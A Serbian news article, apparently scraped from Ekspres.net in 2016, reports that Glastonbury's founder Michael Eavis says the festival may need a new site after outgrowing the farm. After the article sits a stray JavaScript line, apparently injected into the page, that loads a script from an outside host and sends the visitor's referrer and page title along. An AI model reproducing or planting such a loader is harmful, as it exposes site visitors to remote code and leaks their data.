Vesti
03.05.2016. 14:58
ekspres

KRAJ JEDNE EPOHE: Seli se Glastonberi?

Ekspres.net
Izvor: Ekspres.net

Osnivač festivala Majkl Evis nagovastio je da bi ove godine Glastonberi mogao poslednji put da se održi na staroj lokaciji, jer je preveliki za sadašnji prostor

 

Uprkos tome što su ogroman prirodni amfiteatar i široka zelena polja verovatno jedan od razloga zbog koga se muzički festival Glastonberi, poznato stecište najznačajnih bendova današnjice, našao na mapama muzčkih sladokusaca preti mu selidba.

Prema rečima osnivača festivala Majkla Evisa ovo bi moglo bi da bude poslednje festivalsko leto na poznatoj  farmi mleka. Evis, koji je započeo Glastonberi festival na svojoj farmi 1970. godine, rekao je okupljenima na Univerzitetu Oksford da je festival "u potrazi za potencijalno novom lokacijom za 2017. godinu ".

U skladu sa tim oksfordska zajednica objavila je na svom Tvitteru profilu reči domaćina manifestacije da je Glastonberi postao toliko veliki da traži novi prostor, navodi Gardijan.

Evis tvrdi da je festival u poslednje vreme morao da iznajmljuje zemljište od vlasnika 22 susedne farme kako bi se stvorili adekvatni uslove za posetioce muzičke fešte. On nije otkrio na koju lokaciju bi festival mogao da bude preseljen.

Lokacija na kojoj je često znalo da se sjati i po 175.000 ljudi mesto je na kom  ostatak godine krave slobodno žive, a tek tokom trajanja fastivala postaje mesto na kome ljubitelji muzike spavaju, gledaju filmove i učestvuju u koncertima i političkim debatama

Ovogodišnji festival traje 22-26. juna, a Adel, "Koldplej" i Bek samo su neki od glavnih izvođača.

Festival "Glastonberi" je jedan od najvećih kulturnih događaja u Velikoj Britaniji kome u proseku prisustvuje više od 150.000 ljudi, a zanimljivo je da najveći deo prihoda odlazi u humanitarne svrhe. Radi se o festivalu muzike, plesa, komedije... Nastao je 1970. godine, samo dan posle smrti Džimija Hendriksa.

 

 s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
6°C
20.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve